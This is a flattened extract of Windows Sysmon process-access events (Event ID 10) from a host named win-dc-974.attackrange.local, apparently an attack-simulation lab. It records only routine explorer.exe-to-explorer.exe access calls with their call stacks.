22:54:54.172{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.172{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.172{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.171{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.171{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.171{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.171{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.171{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.171{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.171{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.171{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.170{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.170{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.170{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.170{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.170{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.170{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.170{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.170{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.170{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.169{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.169{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.169{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.169{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.169{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.169{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.169{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.169{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 